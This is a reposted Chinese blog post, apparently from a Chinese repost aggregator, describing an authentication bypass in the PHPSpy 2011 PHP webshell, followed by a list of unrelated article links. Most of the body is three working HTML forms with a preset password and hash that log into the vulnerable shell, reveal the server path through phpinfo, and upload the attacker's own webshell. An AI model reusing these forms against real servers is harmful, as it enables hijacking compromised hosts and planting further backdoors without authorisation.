Phpspy 2011继续身份验证绕过漏洞
来源:互联网 发布:通联数据面试知乎 编辑:程序博客网 时间:2024/04/28 11:21
Author: Tm3yShell7
官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。
但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:
下面给出一个更为直接的利用方法,上传你自己的新shell:<form method="POST" action="http://www.2cto.com /2011ok11.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="login">
<input type="submit" value="Login"></form>
点击Login,这步点登录后 是登录界面 继续操作下一步:<form method="POST" action="http://www.2cto.com /2011ok.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:<form action="http://www.2cto.com /2011ok.php" method="POST" enctype="multipart/form-data">
<input name="password" type="password" size="20">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="D:/workspace/" type="hidden">
<input name="dir" value="D:/workspace/" type="hidden">
</form>
其中把iploaddir的value改为phpinfo中看到的路径,上传shell。
- Phpspy 2011继续身份验证绕过漏洞
- phpspy
- PHPspy
- 绕过WLAN身份验证
- 绕过单引号继续注入
- MasterKey签名绕过漏洞
- 绕过md5验证继续入侵
- 绕过md5验证继续入侵
- 利用“()”绕过空格继续注射
- iis 5.0认证绕过漏洞
- Bkav联网防火墙绕过漏洞
- Grub2登录绕过验证漏洞
- 文件包含漏洞(绕过姿势)
- 绕过 Apache httpproxy 继续DOS TOMCAT/JBOSS
- 绕过WAF继续SQL注入常用方法
- 多个防火墙产品设置绕过漏洞
- Linux2.4iptablesMAC地址匹配绕过漏洞
- Sun Java System本地绕过的漏洞
- 如何教出一个优秀的孩子
- actcms网站管理系统漏洞0day
- 良精企业通用建站系统漏洞总汇
- hdu 1003 max sum
- 关于GCC的头文件 动态库搜索路径
- Phpspy 2011继续身份验证绕过漏洞
- c#要注意的细节
- MFC 多文档工程 实现多文档用户界面
- 近期温习计划
- 正则表达式javascript和java有点不同
- 菜鸟”程序员和“大神”程序员差距在哪里
- 一些找工作的经验
- Jquery+Json
- Eclipse和MyEclipse安装JQuery插件